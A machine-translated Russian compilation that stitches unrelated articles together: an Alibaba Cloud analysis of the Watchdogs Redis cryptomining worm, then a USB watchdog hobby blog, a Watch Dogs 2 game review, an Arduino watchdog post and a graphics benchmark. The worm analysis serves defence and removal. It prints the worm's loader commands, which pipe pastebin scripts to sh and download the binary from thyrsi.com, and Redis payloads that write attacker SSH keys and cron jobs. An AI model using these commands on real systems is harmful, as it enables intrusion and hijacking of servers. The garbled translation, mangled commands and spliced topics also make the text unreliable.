«В следующем сообщении в блоге представлена одна из самых быстрорастущих вредоносных программ на сегодняшний день — майнинговый червь Watchdogs. Как мы видели на протяжении 2018 года и теперь в 2019 году, снижение стоимости биткойнов и других криптовалют не меняет тенденции к увеличению активности. вредоносных программ для крипто-майнинга.Это означает, что рентабельность инвестиций в эту вредоносную деятельность по-прежнему высока, и мы, вероятно, увидим ее рост в обозримом будущем.
Этот пост дает отличную справочную информацию о самом черве и углубляется в анализ его двоичного кода, процессов, поведения и т. Д. Вдобавок ко всему, он предоставляет практические рекомендации по способам удаления Watchdogs с ваших устройств ».
Йохай Эйнав, главный исследователь в области безопасности, лаборатория инноваций в области безопасности
Обзор
20 февраля в 17:00 по пекинскому времени команда Alibaba Cloud Security обнаружила крупномасштабное событие майнинга, вызванное червем Watchdogs, и немедленно инициировала экстренное реагирование.
За короткое время этот червь заразил большое количество хостов Linux. Червь распространяется, используя две распространенные проблемы неправильной конфигурации Redis — несанкционированный доступ и слабые пароли. Затем червь считывает список IP-адресов из файла known_hosts и использует результаты для входа на другие узлы, доверяющие зараженным узлам. Это не первый случай, когда черви используют один из этих двух методов распространения, но сочетание этих методов делает Watchdogs очень мощными.
Watchdogs — не первый червь Redis, оказавший такое большое влияние. На сегодняшний день проблемы конфигурации Redis используются более чем 40 типами червей. Кроме того, проблемы конфигурации в других типах баз данных также могут стать новыми целями в будущем.
В этой статье мы анализируем структуру майнингового червя Watchdogs и обсуждаем, как его удалить. Мы также предоставляем предложения по экстренному реагированию и дальнейшему предотвращению подобных крупномасштабных вторжений.
Watchdogs Процесс заражения горным червем
На следующем рисунке показан типичный процесс заражения Watchdogs:
Распространение червя
Злоумышленник сначала сканирует возможные серверы Redis, которые допускают несанкционированный доступ или имеют слабые пароли, и получает контроль над соответствующими хостами. Скрипт эксплойта запускается по следующей ссылке:
https://pastebin.com/raw/sByq0rym
, который содержит декодирование bse64 и команду для получения с другого URL:
(curl -fsSL https: // мимо ebin.com / raw / D8E71JBJ || wget -q -O- https://pastebin.com/raw/D8E71JBJ)|base64 -d | sh
Содержимое в https://pastebin.com/raw/D8E71JBJ
декодируется в сценарий bash, который инструктирует загрузку основной вредоносной программы, «Watchdogs», которая скрыта как изображение в формате JPEG с устройства thyrsi [.] Com :
(curl -fsSL http://thyrsi.com/t6/672/1550667479x1822611209.jpg -o / tmp / watchdogs || wget -q http://thyrsi.com/t6/672/1550667479x1822611209.jpg -O / tmp / сторожевые таймеры) && chmod + x / tmp / сторожевые таймеры
Как показано на рисунке выше, боковое движение этого червя делится на две части.
Первая часть — это следующий сценарий bash, который загружает список известных хостов и хостов с учетными данными, хранящимися в /root/.ssh/known_hosts и /root/.ssh/id_rsa.pub, пытается войти в систему и распространяет другие вредоносные команды. на этих машинах.
Вторая часть — это программа Watchdogs, которая движется горизонтально, используя несанкционированный доступ к Redis и взламывая SSH грубой силой.
В частности, функция bbgo () в программе Watchdogs используется для получения списка IP-адресов для атаки.
Затем червь пытается войти в службу SSH на этих хостах. В случае успеха червь загрузит и запустит сценарий загрузчика.
Тем временем функция ago () сканирует и атакует Redis.
Вредоносный скрипт
Помимо перемещения по горизонтали и загрузки программы Watchdogs, сценарий bash также может выполнять следующие действия:
- Добавьте запланированную задачу, запускаемую каждые 10 минут, чтобы загрузить сам сценарий bash в crontab.
- Убить подобных добывающих червей и троянов.
- Убейте любые другие процессы, которые потребляют более 80% ЦП, что устраняет возможных конкурентов, типичная процедура для большинства угонщиков майнинга криптовалюты.
Короче говоря, сценарий Bash предназначен для внедрения, сохранения и бокового перемещения вредоносного ПО.
Анализ двоичных данных сторожевых таймеров
Watchdogs — это исполняемый файл ELF, скомпилированный на языке Go.Его структура показана на следующем рисунке.
1. LibiosetWrite ()
Эта функция извлекает и записывает общую библиотеку libioset.so.
2. Cron ()
Эта функция добавляет дополнительные запланированные загрузки к нескольким файлам cron, таким как /etc/cron.d/root, что затрудняет удаление вредоносного ПО.
3. KsoftirqdsWriteRun ()
Эта функция распаковывает программу интеллектуального анализа данных и обновляет ее файл конфигурации.
Где функции bbgo () и ago () обсуждались в предыдущем разделе «Распространение червя».
Таким образом, после выполнения сценария Bash Watchdogs выпускает и запускает программу интеллектуального анализа данных, записывает вредоносный файл .so и распространяет червя по сторонам.
Анализ libioset.so
На следующем рисунке показан список функций экспорта libioset.so, таких как unlink, rmdir, readdir и т. Д.
Например, функция unlink (), основной вызов функции перед командой ‘rm’.
Он исключает вызовы функции unlink () для файлов, содержащих следующие строки: «ksoftirqds», «ld.so.preload» и «libioset.so». В результате эти ключевые вредоносные файлы не могут быть должным образом удалены.
То же самое и с другими командами, такими как readdir. Они не могут должным образом возвращать какие-либо результаты, связанные с вредоносными программами.
Еще хуже сказывается функция fopen. Система вызывает функцию fopen при запросе использования ЦП и использования порта, и злоумышленник перехватывает эту функцию, так что система вызывает поддельную функцию злоумышленника при чтении файлов ‘/ proc / stat’ и ‘/ proc / net / tcp’.
Где функция forge_proc_cpu () возвращает жестко закодированные поддельные результаты.
Вредоносное подключение системных функций затрудняет пользователям проверку того, действительно ли существует процесс майнинга, и если да, то какой именно процесс майнинга.
Подключение к червю Kworkerd
«Многие мальчики-хакеры скопировали мой код» — обзор червей, взламывающих базы данных
Червь Watchdogs принадлежит тому же автору, который написал червей Kworkerd в 2018 году, поскольку оба червя используют один и тот же адрес кошелька и одинаковые методы атаки.Подробнее о Kworkerd см. В нашем отчете об анализе угонщиков криптовалюты за 2018 год.
Это также подтверждается комментарием автора в конце вредоносного скрипта:
№1. Если вы взломаете мою программу, пожалуйста, не раскрывайте слишком много кода в Интернете. Многие мальчики-хакеры скопировали мой код kworkerds, все больше систем подвергаются атакам. (Особенно libioset) …
Высказывание здесь «Многие мальчики-хакеры скопировали мой код kworkerds» показывает тот факт, что, когда злоумышленник использует определенный метод атаки и добивается успеха, другие злоумышленники вскоре будут имитировать и копировать код.
Согласно нашей статистике, в результате такой «имитационной игры» количество червей, использующих проблемы в Redis, резко возросло с одного в 2018 году до более 40 сегодня. Многие из них имеют дурную славу, например, майнинговые группы DDG и 8220. Кроме того, недавно появившиеся черви оснащены эксплойтным модулем Redis, поскольку в Интернете существуют тысячи неправильно настроенных баз данных Redis. Если злоумышленники возьмут только кусок этого пирога, их прибыль может значительно увеличиться.
Короче говоря, если пользователь не настроит и не защитит базы данных Redis должным образом, он может получить более 40 различных червей.
На следующей диаграмме показаны тенденции трафика атак, нацеленных на Redis, и количество скомпрометированных машин за последние шесть месяцев. Ясно, что атаки Redis постепенно перенимаются крупными ботнетами, что привело к высокому объему атак в октябре и ноябре 2018 года. И после трех месяцев относительного молчания в феврале этого года снова произошел всплеск.
Типичные этапы атак Redis
Основной метод атак на базы данных Redis прошел три этапа.
1. Злоумышленники записывают ключи SSH на серверы Redis, к которым можно получить доступ без авторизации для входа в службу SSH.
Для этого злоумышленники запускают следующую полезную нагрузку:
config set dir /root/.ssh/
config установить dbfilename authorized_keys
установить x "\ n \ n \ nssh-rsa [sshkey] root @ kali \ n \ n \ n"
экономия
Где [sshkey] обозначает ключ злоумышленника.
2. Злоумышленники записывают файл crontab на серверы Redis, к которому можно получить доступ без авторизации для периодического выполнения вредоносных операций.
Для этого злоумышленники запускают следующую полезную нагрузку:
набор конфигураций dir / var / spool / cron
config установить dbfilename root
установить x "[злая команда]"
экономия
Где [злая команда] обозначает вредоносную команду, которая периодически выполняется.
3. На двух вышеупомянутых этапах атакуются только серверы Redis, к которым можно получить доступ без аутентификации. На третьем этапе атакуются также серверы Redis, на которых требуется проверка пароля, но пароли слабые.Это еще больше расширяет масштаб атаки.
Более того, Redis — не единственная база данных, одобренная хакерами. Как показано в следующей таблице, проблемы безопасности общих баз данных, включая SQL Server, MySQL и MongoDB, также используются несколькими ботнетами для майнинга. Основные методы эксплуатации включают несанкционированный доступ, взлом паролей и эксплуатацию уязвимостей.
База данных | Ботнет и атаки |
SQL Server | Mykings и Bulehero |
MongoDB | Xbash и несколько событий выкупа |
MySQL | 8220 и Mykings |
Диван DB | 8220 |
Помня об этих трех этапах атак, мы разработали процедуру удаления этого вредоносного ПО, а также предоставили рекомендации по повышению безопасности ваших баз данных.
Процедура удаления сторожевых таймеров
1. Остановите службу cron.
Выполните следующую команду:
остановка обслуживания crond
или же
/etc/init.d/cron stop
2. Используйте BusyBox, чтобы удалить два файла .so:
sudo busybox rm -f /etc/ld.so.preload
sudo busybox rm -f /usr/local/lib/libioset.so
Судо ldconfig
BusyBox — это небольшой набор инструментов UNIX, интегрированный во многие системы Linux. Он нам нужен для ‘rm’, потому что предоставленная системой команда rm перехватывается вредоносным libioset.Таким образом, собственная команда ‘rm’ из bash не может правильно удалить библиотеку .so. Команда rm BusyBox компилируется статически, на что не влияет Watchdogs.
3. Убить вредоносные процессы.
sudo kill -9 `ps -ef | grep Watchdogs | grep -v grep | awk '{print $ 2}'`
sudo kill -9 `ps -ef | grep ksoftirqds | grep -v grep | awk '{print $ 2}'`
4. Удалите файлы, относящиеся к cron, и перезапустите службу cron.
В частности, проверьте следующие места и удалите вредоносные команды:
/ var / spool / cron / crontabs / root
/ вар / катушка / cron / корень
/ etc / cron.d / корень
Затем выполните следующую команду:
запуск службы crond
(или /etc/init.d/cron start)
Рекомендации по безопасности
Приобретение криптовалюты настолько зависит от вычислительных ресурсов, что способствует масштабным вторжениям хакеров. Watchdogs — не первое событие вторжения в базу данных и, конечно же, не последнее. В качестве платформы, которая всегда принимает во внимание безопасность, Alibaba Cloud предоставляет надежную инфраструктуру безопасности и широкий спектр продуктов безопасности, чтобы помочь пользователям противостоять атакам и вторжениям, связанным с майнингом.Для защиты вашей инфраструктуры Alibaba Cloud также рекомендует следующие меры безопасности:
1. Усилить пароль службы базы данных. По возможности избегайте открытия службы базы данных в Интернете. Если его необходимо открыть в Интернете, внедрите соответствующий список управления доступом (ACL) на основе фактических условий. Эти меры могут эффективно предотвратить такие атаки, как майнинг и программы-вымогатели. Кроме того, регулярно выполняйте резервное копирование данных и обращайте пристальное внимание на сигналы тревоги, генерируемые продуктами безопасности.
2. Если вы подозреваете, что ваш хост был заражен или заминирован, проверьте использование ЦП, запущенные процессы и запланированные задачи, чтобы определить источник вторжения. Это требует, чтобы у вас были некоторые знания в области безопасности, а метод атаки относительно прост.
3. Чтобы противостоять злоумышленникам, которые используют сложные методы атаки (например, червь Watchdogs, который делает недействительными системные команды, такие как ps и top), мы рекомендуем вам использовать облачный брандмауэр следующего поколения, предлагаемый Alibaba Cloud Security, который блокирует вредоносные внешние подключения и поддерживает настройку интеллектуальных политик для эффективного предотвращения вторжений.Поскольку такие операции, как загрузка, добыча и отправка обратной оболочки, запускают вредоносные внешние подключения, облачный брандмауэр может полностью заблокировать цепочку атак. Кроме того, вы можете использовать настраиваемые политики, чтобы напрямую блокировать веб-сайты, которые широко используются майнинговыми червями, такими как pastebin.com и thrysi.com, для блокировки вторжений.
4. Пользователи с более высокими требованиями к настройке могут использовать управляемую службу безопасности Alibaba Cloud. После того, как вы приобретете эту услугу, опытные специалисты по безопасности предоставят вам консультационные услуги и настроят решения для вас, а также помогут укрепить вашу систему для предотвращения вторжений.Если событие вторжения уже произошло, специалисты по безопасности также могут помочь в таких вопросах, как удаление вирусов и отслеживание источника атаки. Эта услуга подходит для пользователей с высокими требованиями к безопасности и предприятий, у которых нет инженеров по безопасности, но которые хотят обеспечить безопасность системы.
IOC
Адрес кошелька
46FtfupUcayUCqG7Xs7YHREgp4GW3CGvLN4aHiggaYd75WvHM74Tpg1FVEM8fFHFYDSabM3rPpNApEBY4Q4wcEMd3BM4Ava
Адрес шахтного пула
xmr.f2pool.com
Вредоносный URL
pastebin.com/raw/sByq0rym
thyrsi.com/t6/672/1550667515×1822611209.jpg
Вредоносный файл
Имя файла | MD5 |
Сторожевые псы | aee3a19beb22527a1e0feac76344894c |
Создание сторожевого USB-скрипта
Мой интерес к миру криптовалюты рос в последние несколько месяцев.Чтобы удовлетворить этот интерес, я наконец-то получил установку для майнинга криптовалют.
Те из вас, кто знаком с установками для майнинга, сталкивались со сторожевыми собаками USB. Это небольшие устройства, которые подключаются к USB-порту с целью мониторинга вашего компьютера и его перезапуска в случае зависания вашей системы.
Работа сторожевого таймера USB проста:
Вставьте устройство в свободный порт USB. Необходимо подключить четыре контакта.Используйте перемычки, чтобы соединить два контакта с кнопкой сброса, а два других контакта — с переключателем питания.
После включения устройство ожидает в течение заранее определенного периода времени, чтобы получить сообщение о том, что компьютер все еще функционирует должным образом. Если это сообщение не будет получено в назначенное время, компьютер будет перезагружен.
Шаг 2 повторяется бесконечно.
Специализированное программное обеспечение отвечает за отправку сообщений сторожевому таймеру.Если ваш компьютер выйдет из строя или зависнет, программа не сможет передать сообщение. Если временной интервал превышен до получения сообщения, сторожевой таймер получает предупреждение о проблеме с системой. Затем он инициирует аппаратный сброс, который эквивалентен нажатию кнопки перезагрузки компьютера. Сторожевые устройства
USB поставляются с этим специализированным программным обеспечением, хотя в моем случае программа была практически бесполезной. Он был разработан для использования на машине с Windows, и я использую компьютер с Linux для моей майнинговой установки.Это создало проблему, которую необходимо было решить.
Взглянув на программное обеспечение Windows, оно показалось довольно простым, поэтому я решил попробовать перепроектировать приложение.
Это было легко сделать:
Во-первых, мне нужна была программа, которую можно было бы использовать для отслеживания соединения и данных, передаваемых сторожевому таймеру. Быстрый поиск в Google направил меня к ценному инструменту — мониторингу COM-порта.
Использование анализатора последовательного порта облегчило расшифровку необходимых шаблонов.Вам необходимо проверить настройки последовательного порта, которые должны быть:
- Скорость передачи: 9600
- Биты четности: нет
- Стоп-биты: 1
Это все, что вам нужно, чтобы начать передачу сообщений на сторожевой таймер USB.
Протокол:
Следующим аспектом, который следует учитывать, является используемый протокол. И снова сниффер позволяет вам провести это расследование.
Первое, на что следует обратить внимание, это то, что когда программное обеспечение сторожевого таймера запускается, оно отправляет пакет (0x80), на который сторожевое устройство отвечает (0x81).Несмотря на незнание точного способа кодирования данных, довольно очевидно, что это первоначальное сообщение о подключении содержит версию прошивки.
Затем я обнаружил, что последовательность байтов (0x10) отправляется со скоростью один в секунду. Это было со значением тайм-аута 160 секунд. Изменение значения тайм-аута на десять секунд привело к тому, что программа отправила другой байт (0x01).
Согласно некоторым выводам, если значение байта, равное единице, равно десяти секундам, 160 секунд должны быть представлены числом 16.А 16 представлен в шестнадцатеричной системе счисления 0x10.
При нажатии кнопки сброса срабатывают реле и отправляется байт 0xff.
Насколько мне известно, доступны только три операции:
- Отправить контрольное сообщение, содержащее текущее значение тайм-аута.
- Проверить версию прошивки.
- Сброс.
Скрипт
Готовый скрипт достаточно прост. Исходный код доступен для использования по адресу (https: // github.com / zatarra / usb-watchdog).
Определенно есть место для расширения функциональности сценария несколькими способами, ограниченными только вашим воображением. Некоторые предложения состоят в том, чтобы удаленно запустить установку для майнинга или протестировать видео на видеокартах вашей системы.
Предупреждение: установка слишком низкого интервала сердцебиения может иметь неприятные последствия. Если вы установите его на одну минуту, это время, которое вы должны отреагировать, если ваш компьютер выйдет из строя. Вам нужно будет загрузить машину и запустить скрипт в течение этого периода времени. В противном случае ваш компьютер попадет в бесконечный цикл, что может быть очень неприятным, если вы используете удаленно расположенную установку для майнинга.
Проверьте этот репозиторий кода, чтобы найти последнюю версию скрипта.
Если вы найдете это поучительным, с благодарностью принимаются пожертвования в виде напитка для взрослых.
Watch Dogs 2 — IGN
Watch Dogs 2 впечатляет открытым дизайном миссий с несколькими способы достичь своей цели и отличные игрушки, чтобы их найти.Меня не устраивает тон его истории и персонажей, но я прекрасно провел время, изучая карту Bay Area. Это значительное улучшение по сравнению с оригинальными Watch Dogs почти во всех отношениях.
Одна из главных претензий к оригинальным Watch Dogs заключалась в том, что их главный герой-хакер, занимающийся ремонтом, Эйден Пирс — мягкий и непривычный персонаж. Ubisoft прислушалась и покинула Пирса в Чикаго, встретившись в районе залива с гораздо более представительным хакерским линчевателем Маркусом Холлоуэем, который руководствуется не слепой местью, а философией и не всегда воспринимает себя всерьез.Если не считать нескольких вызывающих передергивание шуток, Маркус мне нравится намного больше. Несмотря на то, что он и его банда хакеров-линчевателей, Дедсек, немного неприятны и мелочны в своем крестовом походе против оруэлловского государства слежки, которым стала эта версия Америки, в целом их можно связать.
Но неожиданный поворот: это своего рода проблема, потому что я просто не считаю Маркуса убийцей, который десятками косит людей ярким, напечатанным на 3D-принтере штурмовым оружием. Его образ в роликах, разглагольствующих против неправомерного использования личной информации людей, страстен, и он кажется в целом хорошим человеком.А затем начинается миссия, и он может уничтожить группу частных охранников, членов банды или, что еще хуже, настоящую полицию Сан-Франциско, прежде чем снова вернуться к относительной беспечности в роликах, не обращая внимания на все убийства и хаос. Это странное отключение, которое ощущается иначе, чем отыгрывание роли жестокого преступника, такого как Тревор Филипс или Майкл де Санта, и, хотя это не повлияло на механику, я постоянно замечал и чувствовал это.
Watch Dogs 2 — это не только игра-стелс, но и игра-стелс.« Поскольку не существует системы морали для наказания (или поощрения) насильственного поведения, личность Маркуса — единственное, что подталкивает нас к нелетальному стилю игры, состоящему из скрытности и бесшумных убийств. Хотя она не так продумана, как Hitman (например, вы не можете спрятать бессознательные тела, чтобы избежать обнаружения), Watch Dogs 2 — это не только игра-стелс, но и экшн. Поиск тихого пути к цели — более интересный и сложный способ игры, который заставляет вас использовать все свои инструменты, включая дронов, которые могут проехать через небольшие пространства или взлететь, чтобы взломать то, чего вы не могли достичь.Они отлично подходят для осмотра области, прежде чем вы начнете заряжать себя. Жалко, что попытки вести обратный отсчет трупов остаются незамеченными — даже идеальное привидение миссии дает вам такую же награду, как превращение всех, кого вы встречаете, в призраков.
Хотя я все равно пытался это сделать, нелетальных приемов недостаточно, когда тебя поймают в эпицентре высокотехнологичного ограбления. Вы можете сражаться с людьми в ближнем бою и нокаутировать их (или, может быть, попадание в лицо импровизированным оружием ближнего боя Маркуса убивает их, я не совсем уверен), и у вас есть электрошокер с бесконечным боезапасом, который может вывести из строя людей на расстоянии, но он медленно срабатывает (даже с апгрейдом).Он не может сравниться с волной охранников с пистолетами-пулеметами, и поэтому, не всегда к лучшему, появляются большие пушки.
У вас достаточно средств непрямой атаки, чтобы чувствовать себя способным в бою.« Начинаются перестрелки с использованием той же стрельбы под прикрытием, которая почти повсеместна в криминальных играх с открытым миром. Watch Dogs 2 немного отличается от большинства, потому что даже на нормальном уровне сложности вы не очень прочны, а ИИ достаточно хорош в использовании укрытий и агрессивных флангах. (Кроме того, ручные гранаты есть у гораздо большего числа банд Сан-Франциско, чем я мог подумать.) Но у вас достаточно средств непрямой атаки, чтобы чувствовать себя способным в бою, и некоторые из них очень забавны. Враги, несущие взрывчатку, могут быть взломаны, чтобы взорвать их бомбы, некоторых можно оглушить, перегрузив средства связи гарнитуры, а любой, кто окажется рядом с взломанным оборудованием в окружающей среде, может быть потрясен или взорван от удара кнопка.
Но мне больше всего нравится способность вызывать разгневанных членов банды или полицию и нацеливать их на кого угодно, сфабриковав улики.Это не просто средство нападения, это фантастическое отвлечение: я люблю вызывать их на дальнем конце области, а затем бегать, чтобы схватить мою цель, в то время как охранники слишком заняты с ними, чтобы заметить меня. Этой уморительной силой можно злоупотреблять полу-игровым способом: вы можете продолжать вызывать их (после того, как ваш счетчик мощности перезарядится), пока все враги не будут мертвы, не поднимая пальца.
Обычно у вас есть несколько вариантов для каждого взломанного элемента.“ В целом взлом более гибок, чем в первых Watch Dogs — обычно у вас есть более одного варианта для каждого взломанного элемента.Например, вы можете открыть дверь с помощью взлома или заблокировать ее, чтобы никто не мог следовать за вами в течение нескольких секунд. Вы можете взорвать электрический ящик, чтобы оглушить кого-то поблизости, заставить его выйти из строя, чтобы привлечь внимание, или превратить его в мину, которая взорвется, когда кто-то приблизится. Во всяком случае, может быть слишком много элементов, которые можно взломать, до такой степени, что у меня часто возникают проблемы с выбором правильного в ситуациях, когда время имеет значение.
От залива до Брейкерс
Это отличная карта открытого мира, и я говорю это не просто потому, что родился в районе залива и прожил здесь почти всю свою жизнь.Версия Watch Dogs 2 очень сжатая, с целыми районами, оставленными на полу монтажной, но в ней есть все основные достопримечательности в значительной степени там, где они должны быть. (К счастью, постоянно заблокированное движение было опущено.) Это интересное и разнообразное место, чтобы исследовать и буйствовать, и это нереально — оказаться в автомобильной погоне и внезапно взглянуть вверх и увидеть что-то вроде Moscone Center, Palace of Fine Arts, Painted Дамы, Рыбацкая пристань или Стэнфордский университет. Я бы порекомендовал это как виртуальный туризм, особенно если вы бывали здесь раньше и хотите освежиться.
Есть также немало сатиры о районе Сан-Франциско и его культуре, но ничего похожего на остроумие Силиконовой долины HBO. Много юмора проявляется в случайных биографиях, которые всплывают, когда вы взламываете мирных жителей, некоторые из которых могут дать вам шутливые отрывки телефонных звонков или текстовых разговоров, в то же время очеловечивая толпу и делая меня менее увлеченным попыткой управлять ими нарочно.
Блог оArduino »Самодельный аппаратный сторожевой таймер для вашей майнинг-фермы
Сторожевой таймер оборудования для майнинга своими руками
Команда Arduino — 2 марта 2018 г.
Вадим Панов хотел получить простой и дешевый способ автоматической перезагрузки ПК.
Для этой задачи он обратился к Uno из-за его широкой доступности; однако любая плата Arduino с хотя бы одним цифровым выводом ввода / вывода и последовательным портом с поддержкой USB будет работать.
Устройство отправляет на ПК строку приветствия, на которую он ожидает ответного сообщения «ПРИВЕТ» от ПК, запускающего собственную соответствующую программу Java, в течение 10 секунд. Если он не получает эту строку, он предполагает, что компьютер завис, и использует герконовое реле для срабатывания контакта сброса материнской платы.
ИдеяПанова может быть использована для мониторинга и сброса криптовалютных ригов, но при необходимости может быть адаптирована к другим настройкам ПК.
Вот как это работает: программа на стороне ПК пытается подключиться к каждому последовательному порту в вашей системе в течение 30 секунд (включая порты, которые появляются во время этого процесса). На каждый порт он отправит строку подтверждения «hello» и будет отслеживать ввод, ожидая ответа «HELLO» в верхнем регистре. По завершении рукопожатия строки пинга будут отправляться каждые пять секунд.
Программа-сторожевой таймер на Arduino сканирует ввод на предмет строк «ping». Если в течение 10 секунд такой строки не было получено, сторожевой таймер принудительно перезагрузит ваш компьютер.
Следовательно, этот сценарий, в котором вы запускаете его вручную, будет «одноразовым», то есть после перезапуска ПК сторожевой таймер застрянет в состоянии до установления связи. Чтобы она работала постоянно, добавьте программу Java в список автозагрузки выбранной вами операционной системы.
Вы можете узнать больше здесь и проверить это в действии ниже!
Вы можете следить за любыми ответами на эту запись через канал RSS 2.0. Вы можете оставить отзыв или откликнуться со своего сайта.
ТестированиеWatch Dogs 2 — Tom’s Hardware
Лучшие на сегодня Crucial MX200 (500 ГБ) сделок
Введение и выбор тестов
Вот факт: Watch Dogs 2 не работает так хорошо без приличного оборудования. Сегодня мы не фокусируемся на истории. Скорее, мы пытаемся сделать игру максимально привлекательной. Мы знали, что в этом проекте будут задействованы несколько лабораторий Tom’s Hardware, поэтому мы не хотели просто запускать те же тесты, что и все остальные.Надеюсь, вы сочтете, что наши дополнительные усилия того стоят.
После завершения длинного и полностью линейного вступительного уровня пора войти в открытый мир Watch Dogs 2 . Первое выступление в игре с панорамными видами с моста Золотые Ворота одновременно и красиво, и является настоящим испытанием для вашего оборудования.
На самом деле мы прошли введение дважды, основываясь на разных сохраненных играх. Многопользовательская игра добавляет дисперсию, которую невозможно контролировать, поэтому наши тесты выполняются исключительно в автономном режиме.Тесты также извлекают выгоду из инструмента God Mode. В конце концов, добиться постоянных цифр намного сложнее, если вас продолжают убивать.
Предустановленные или пользовательские настройки?
Watch Dogs 2 имеет массу настроек графики, с которыми можно поэкспериментировать. Если вы любите настраивать каждую деталь, играя с индивидуальными параметрами и перезагружая игру миллион раз, то система меню будет у вас в восторге.
Опять же, не каждый игрок пытается найти идеальный баланс между производительностью и качеством графики для своей конкретной конфигурации оборудования.Игра учитывает это, предлагая не менее пяти предустановок в дополнение к обычному диапазону разрешений. Шестая предустановка зарезервирована для пользовательских настроек.
Пресеты «Низкий» и «Средний» выглядят не очень хорошо. Используйте их только в том случае, если любая другая комбинация параметров детализации не воспроизводится. Визуальная точность улучшается от предустановки High и выше. Игровой мир оживает, а Very High и Ultra обеспечивают лишь незначительные улучшения качества. Эти два последних режима также требуют гораздо большего от вашего оборудования.
Изображение 1 из 3 Изображение 2 из 3 Изображение 3 из 3 Изображение 1 из 3 Изображение 2 из 3 Изображение 3 из 3В конечном итоге, лучше всего выбрать предустановку, которая дает кадр ставки, которые вам удобны, а затем выполните точную настройку оттуда. Когда дело доходит до графики, у каждого свои предпочтения, и Watch Dogs 2 предоставляет инструменты для экспериментов и настройки всего в соответствии с вашими предпочтениями.
БОЛЬШЕ: весь игровой контент
Сглаживание и производительность
Красота имеет свою цену. Watch Dogs 2 Открытый мир выглядит фантастически и предлагает большое разнообразие, но детализированное окружение и текстуры с высоким разрешением также страдают от мерцающих неровных краев, которые полностью отображаются, как только вы начинаете двигаться. К счастью, есть несколько настроек сглаживания, некоторые из которых можно комбинировать, чтобы решить эту проблему.
Геймеры с бюджетным оборудованием или относительно небольшим объемом графической памяти не смогут обойти постобработку SMAA или FXAA.Также можно активировать временную фильтрацию, которая обеспечивает масштабированное изображение с более низким разрешением. Результат довольно мутный, но с этой настройкой проще работать с вашей видеокартой, и она действительно помогает бороться с артефактами наложения спектров. Просто не ожидайте лучшей визуальной точности.
Владельцы GeForce могут использовать TXAA (2x / 4x / 8x), что практически исключает мерцание. Но есть недостаток: картинка становится немного размытой. Как обычно, ключевым моментом является поиск правильного компромисса. Установите самое низкое значение TXAA и отрегулируйте резкость по вкусу.Конечно, мощное железо очень помогает.
Другой вариант — придерживаться старого подхода: MSAA (от 2x до 8x), хотя у него есть свои недостатки. На самом деле идеального решения не существует. Возможно, предпочтительнее включить SMAA и положить этому конец, что возвращает нас к началу нашего обсуждения.
Shadows & Ambient Occlusion
Watch Dogs 2 неоправданно использует свет, отбрасывая множество теней. И, как это часто бывает с новыми играми, библиотеки Nvidia GameWorks не отстают.Независимо от того, как вы к ним относитесь, в Watch Dogs 2 реализована не одна, а две функции теней GameWorks.
Первый называется Hybrid Frustum Traced Shadows (HFTS) и предназначен исключительно для Nvidia. Предполагается, что различные резкие и мягкие тени сочетаются друг с другом более реалистично. Предупреждаем: это аппаратный убийца, и он доступен только на видеокартах на базе Maxwell и Pascal второго поколения.
С Percentage-Closer Soft Shadows (PCSS) возможность увидеть, как у вашего графического процессора выдохся, не только владельцы GeForce.Любой, у кого есть карта Radeon, тоже может присоединиться к веселью. По крайней мере, вы получите более точную тень от ваших проблем, особенно когда геометрия имеет разный уровень мягкости. Эта функция не идеальна, то есть ошибки все еще есть, но она, безусловно, выглядит хорошо.
Если вы не чувствуете необходимости доводить реализм до крайности, придерживайтесь предустановки качества Ultra. В некоторых случаях это действительно лучше, поскольку качество изображения может быть более резким.
Изображение 1 из 3 Изображение 2 из 3 Изображение 3 из 3 Изображение 1 из 3 Изображение 2 из 3 Изображение 3 из 3Watch Dogs 2 Качество теней требует окклюзии окружающей среды это максимально реалистично.Это делает картинку более яркой и объемной. Это означает, что, как обычно, эта опция должна быть включена. Игра предлагает несколько разных версий. Помимо проприетарных, есть HBAO +, который одинаково работает на оборудовании Nvidia и AMD и на наш вкус слишком силен. Мы предпочитаем SSBC или HMSSAO, в зависимости от вашего оборудования и предпочтений в деталях.
Original Textures & Texture DLC
Мы решили пропустить DLC текстуры высокого разрешения в наших тестах по двум причинам.Во-первых, для этого требуется не менее 6 ГБ графической памяти, что исключает множество очень важных карт. Во-вторых, мы хотели протестировать широкий спектр графического рынка, и включение DLC в качестве дополнительной опции добавило бы кучу времени на тестирование.
Оригинальные текстуры неплохие, но на близком расстоянии они становятся размытыми. Им не хватает определенной четкости. Просто подумайте дважды о загрузке пакета текстур с высоким разрешением, если вы не качаете, по крайней мере, графический процессор верхнего среднего уровня. Заполнение карты GDDR5 / HBM приведет к сокращению параметров качества, которые вы можете включить при воспроизводимой частоте кадров.
Настройки текстуры, которые вы получаете из каждого пресета, идеальны без DLC. Регулируйте их, только если у вас есть запасной запас.
Требования к памяти
Сложите все требования к памяти для всех настроек, и вы получите общую занимаемую площадь Watch Dogs 2 . Если вы исчерпываете все параметры, то есть устанавливаете для игры предустановку Ultra, а затем вручную увеличиваете настройки, которые еще не превышены, то технически вы превышаете емкость даже могучей GeForce GTX 1080 от Nvidia с 8 ГБ. из GDDR5X.
Приведенная ниже таблица основана на собственных расчетах Watch Dogs 2. Первоначально они казались несколько завышенными по сравнению с результатами нескольких инструментов измерения, но оказалось, что некоторые из них были слишком низкими для длительных игровых сессий. Эти числа дают хорошее представление о том, сколько памяти должна иметь видеокарта.
Два усредненных теста дают оптимальные результаты
Мы создали и протестировали две последовательности тестов. На выполнение каждого из них требовалось время, сознательно компенсируя небольшие колебания.Мы научились использовать подобную методологию для игр с открытым миром из нашего опыта с GTA V . Это также имеет смысл статистически, поскольку со временем вариации, как правило, уравновешиваются. Мы провели несколько тестов и обнаружили, что все, что меньше 1:30, непоследовательно и не может быть воспроизведено надежно.
Наш первый тестовый прогон представляет собой бег по сельской местности продолжительностью 1:50. С видеокартой все сложнее, чем предполагалось изначально; нагрузка на самом деле похожа на езду по городу.На этом маршруте почти нет NPC или транспортных средств, поэтому результаты легко воспроизвести. Загрузка ЦП значительно ниже, чем в местах с большой плотностью населения или большим количеством транспортных средств. Это означает, что графика — единственное узкое место.
Мы используем поездку на велосипеде продолжительностью 1:40 для нашего второго прогона теста, чтобы оценить, как взаимодействие между графическим процессором, графическим драйвером и процессором влияет на результат. Мы выбрали велосипед вместо автомобиля, чтобы нам было легче преодолевать пробки без столкновений.Загрузка процессора была значительно выше, чем на мосту Golden Gate. Также было легко определить, какие графические драйверы хорошо используют ресурсы ЦП.
